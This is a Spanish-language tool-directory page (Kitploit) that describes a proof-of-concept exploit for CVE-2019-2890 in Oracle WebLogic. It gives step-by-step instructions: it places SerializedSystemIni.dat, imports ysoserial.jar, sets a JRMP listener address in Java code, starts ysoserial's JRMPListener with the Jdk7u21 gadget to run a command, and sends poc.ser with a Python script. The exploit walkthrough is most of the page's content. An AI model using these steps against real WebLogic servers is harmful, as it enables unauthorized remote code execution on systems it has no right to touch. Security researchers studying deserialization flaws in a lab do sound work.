Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-2890 — Exploit PoC para CVE-2019-2890 dirigido a Oracle WebLogic, usando payload JRMP de ysoserial para ejecución remota de comandos mediante deserialización de objetos serializados. | Kitploit
Herramientas/GitHubGitHub/l1nk3rlin/cve-2019-2890
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlHerramienta de Acceso Remoto
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

Exploit PoC para CVE-2019-2890 dirigido a Oracle WebLogic, usando payload JRMP de ysoserial para ejecución remota de comandos mediante deserialización de objetos serializados.

Ver Repositorio
85224hace 6 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Descargo de responsabilidad

Solo para fines de aprendizaje e intercambio; cualquier otro uso es bajo su propia responsabilidad.

Instrucciones

Los archivos jar relevantes ya se han importado al proyecto y el método de explotación utiliza el JRMP de yso; durante el aprendizaje y la depuración, puedes modificar el método de explotación.

Primero, coloca el archivo SerializedSystemIni.dat de weblogic en la carpeta security.

Luego, renombra yso a ysoserial.jar e impórtalo en el directorio lib.

1

A continuación, la dirección IP y el puerto de getObject en weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Finalmente, de forma remota a través de la escucha JRMP, utiliza 7u21 para ejecutar comandos.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Método de uso: ejecuta Poc.java para generar el archivo serializado poc.ser y luego:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Descargar herramienta